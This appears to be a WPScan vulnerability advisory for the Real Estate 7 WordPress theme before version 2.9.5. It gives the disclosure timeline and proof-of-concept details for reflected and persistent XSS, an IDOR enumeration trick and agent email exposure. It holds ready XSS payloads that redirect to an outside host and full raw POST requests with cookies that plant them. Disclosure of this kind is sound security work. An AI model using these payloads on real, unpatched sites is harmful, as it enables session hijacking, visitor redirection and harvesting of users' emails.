Themes Vulnerabilities
Real Estate 7 < 2.9.5 - Multiple Vulnerabilities
Description
Multiple vulnerabilities was discovered in the 'Real Estate 7 WordPress', tested version — v2.9.4: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - Authenticated Persistent Self-XSS - IDOR - Information Exposure Edit (WPScanTeam): January 12th - Report Received & Envato Contacted January 13th - Envato Investigating January 13th - v2.9.5 released, fixing the issues
Proof of Concept
----[]- Info: -[]---- Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/ Google Dork: /wp-content/themes/realestate-7/ Demo account #0: m0zePoC/asdasd (login/password) Demo account #1: agent/agent (login/password) PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/ PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/ ----[]- Reflected XSS: -[]---- Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng ----[]- Persistent XSS -> Agent Profile: -[]---- Vulnerable textarea: «Agent Testimonials» (checkbox on «Show on Agents Page» is required). Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1 Host: contempothemes.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------17074317185520 Content-Length: 3843 Origin: https://contempothemes.com Connection: close Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/ Cookie: wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579044656%7CbronP9c4LQmxfjR6G7rde3wkkIjs5f4KLP4uS2GE6d7%7C093dd537ad0162137d9dd0c1d3ab7c3d16fc2e0179b10eef5f47d740417dc11a; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; PHPSESSID=56b216626e434857c0241dc48f07871a5a391362; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; __stripe_sid=c972e371-07ad-479a-bb0d-1e937e4f6077; dsidx-visitor-results-views=2 Upgrade-Insecure-Requests: 1 -----------------------------17074317185520 Content-Disposition: form-data; name="first_name" Agent -----------------------------17074317185520 Content-Disposition: form-data; name="last_name" Demo -----------------------------17074317185520 Content-Disposition: form-data; name="nickname" agent -----------------------------17074317185520 Content-Disposition: form-data; name="display_name" Agent Demo -----------------------------17074317185520 Content-Disposition: form-data; name="user_url" -----------------------------17074317185520 Content-Disposition: form-data; name="description" -----------------------------17074317185520 Content-Disposition: form-data; name="twitterhandle" # -----------------------------17074317185520 Content-Disposition: form-data; name="facebookurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="instagramurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="linkedinurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="youtubeurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="isagent" yes -----------------------------17074317185520 Content-Disposition: form-data; name="agentorder" -----------------------------17074317185520 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1024000 -----------------------------17074317185520 Content-Disposition: form-data; name="ct_profile_img"; filename="" Content-Type: application/octet-stream -----------------------------17074317185520 Content-Disposition: form-data; name="mobile" 6195556589 -----------------------------17074317185520 Content-Disposition: form-data; name="fax" 6195556588 -----------------------------17074317185520 Content-Disposition: form-data; name="title" Agent -----------------------------17074317185520 Content-Disposition: form-data; name="tagline" Selling the Dream! -----------------------------17074317185520 Content-Disposition: form-data; name="agentlicense" 123456 -----------------------------17074317185520 Content-Disposition: form-data; name="userTestimonial" <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------17074317185520 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1024000 -----------------------------17074317185520 Content-Disposition: form-data; name="ct_broker_logo"; filename="" Content-Type: application/octet-stream -----------------------------17074317185520 Content-Disposition: form-data; name="brokeragename" -----------------------------17074317185520 Content-Disposition: form-data; name="brokeragelicense" -----------------------------17074317185520 Content-Disposition: form-data; name="office" 6195553698 -----------------------------17074317185520 Content-Disposition: form-data; name="address" 101 Front St, Suite 100 -----------------------------17074317185520 Content-Disposition: form-data; name="city" San Diego -----------------------------17074317185520 Content-Disposition: form-data; name="state" CA -----------------------------17074317185520 Content-Disposition: form-data; name="postalcode" 92101 -----------------------------17074317185520 Content-Disposition: form-data; name="updateuser" Update Profile -----------------------------17074317185520 Content-Disposition: form-data; name="_wpnonce" b2e5069987 -----------------------------17074317185520 Content-Disposition: form-data; name="_wp_http_referer" /wp-real-estate-7/minimal-demo/account-settings/ -----------------------------17074317185520 Content-Disposition: form-data; name="action" update-user -----------------------------17074317185520-- ----[]- Persistent Self-XSS -> Listing Email Alerts: -[]---- It's self-XSS, but still. Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1 Host: contempothemes.com User-Agent: Mozilla/5.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 294 Origin: https://contempothemes.com Connection: close Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/ Cookie: wordpress_sec_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7Cd622e8a525d082f2219e03f48ec47622cc28f13b6c1bfffef939cbd75ab70756; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7C8b9c07e16d6b093445f725ebb148990345f4ec8e712d60aa196cd134d92278dc; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; dsidx-visitor-results-views=11; PHPSESSID=23386885e76cc0b2eb15a06611a29dda06f8aaee; hwp_visit=1578874746788; hwp_new=true; __stripe_sid=bbfc5ced-5324-4818-b479-8c20006f2a9a ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com ----[]- IDOR: -[]---- Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the «p» parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information). ----[]- Information Exposure: -[]---- Each agent profile page contains the «Email» link as a pop-up form trigger. This form contains hidden input field with agent/user unique email address, for example: <input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" /> Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for «@» symbol from the bottom).
Affects Themes
Fixed in version 2.9.5
References
Classification
Type
MULTI
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter twitter
Verified
No
Timeline
Publicly Published
2020-01-14 (about 3 years ago)
Added
2020-01-14 (about 3 years ago)
Last Updated
2021-01-19 (about 2 years ago)